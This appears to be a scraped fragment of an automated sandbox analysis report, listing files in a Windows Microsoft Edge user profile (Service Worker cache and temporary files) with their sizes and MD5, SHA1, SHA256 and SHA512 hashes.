SHA256e2b6679dadad98167d73dbcb444e56f0b3922e353ee91da6f85cc0853a9e5913
SHA512a6543c345e078006ed35a6387dd7c31e1633e288784bd3e7a1d7f121a252ffdede958856af03090c06376eda7b4384762391cec4341390e53f60f09f16dda7e8
-
Filesize
280B
MD5690f9d619434781cadb75580a074a84d
SHA19c952a5597941ab800cae7262842ab6ac0b82ab1
SHA256fc2e4954dbe6b72d5b09e1dc6360ea699437a2551355c2950da0b3d3a4779fc1
SHA512d6b1da8e7febf926e8b6c316164efbbac22c7c3d9e4933a19fffba3d1667e1993cdeb5064aa53816c0c53f9d2c53e204772de987eb18adbb094a0fb84ae61fa9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index
Filesize1KB
MD5b5c4629e33868448e5328e949e01d6bf
SHA1d0addd774c45f4ae70608380de68789eff022c62
SHA2561ea3e41426e71780633bd1557c640ac388317e7b7b24a8fc4c2e302166f75730
SHA512865115835b6bde2a0c49d5606c2e9badaf47feec8f901d4b4f6cad37fea71c54946374174e3356b3af5470352d9726b4e297a8ec599d7688cb070feb8ef63ebf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index~RFe576968.TMP
Filesize1KB
MD59bc9b61101fd62bfbc91d46345e0536e
SHA15d2ac521af2a4a5416a0d3eb614834f2cf3ad5f4
SHA256f668ff9286fb8a8a60cb706bb431e54e7b69148f900ed8d3643600c403083470
SHA5121d0ad9b6fd68acf6c56626ea3eaabcd5ee6d700c7ca2b3f7a922bee843a95a26eb3fd01d0895c4f5bc45f0d53dc6c5789c280548ac5046ad26978fb2c8a4e922
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ecfb5ed4-8079-46f5-9ab6-c025500e1b55.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
40KB
MD5a57f679bf04a5ae4e12d435e2801fe70
SHA18beb072b889dc873fd132d9e4cc64433e041ae70
SHA2568dcc3fc7b5be0259ae2cdce139d53c6025594627318b83a7f631b380067aa66a
SHA512a2f672c73d3804204992d92ddb07ce282508280be35a1e4179d47ac6c80f0fe2588fe16c42ec822be330e03e39a498ea3aea2ecd3428424ad1c61f1abf932a11
-
Filesize
40KB
MD5e2138ed65da4fd98cc8f8cfff7ed7d19
SHA1f6ca850cd80c18502f94735d8047af7477f83cc6
SHA256e5d7c29e990b1e5b317af924296e21849c72a786e25365906e72217b0869cd8f
SHA512ab2f44670586182e025ddaeaac36c5e4a50857a2b1b45eea86369978c258312592d3ad3fda7aabcb05f01532fdac2f1d45c75be17219523265b1b8768c94d40e
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
249B
MD558bee18be9c68406c39501230ff4f7fe
SHA1b8b1d4c3bb370510b18e617de477e7e7fb89ee93
SHA256a20543b045ab80fe2a0d1a5767bc70442dcf17b2133a0f6e7e9fd28cd16e6e2e
SHA51254e2fa988b293519dfd5c0d9304a4b032842bd06cdb24014f87aa58effc916d0608b6f759c47f2d732651260a48c3bac0179d886af5c2f23d0a86f9fef3d5871
-
Filesize
228KB
MD5ee463e048e56b687d02521cd12788e2c
SHA1ee26598f8e8643df84711960e66a20ecbc6321b8
SHA2563a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8
SHA51242b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f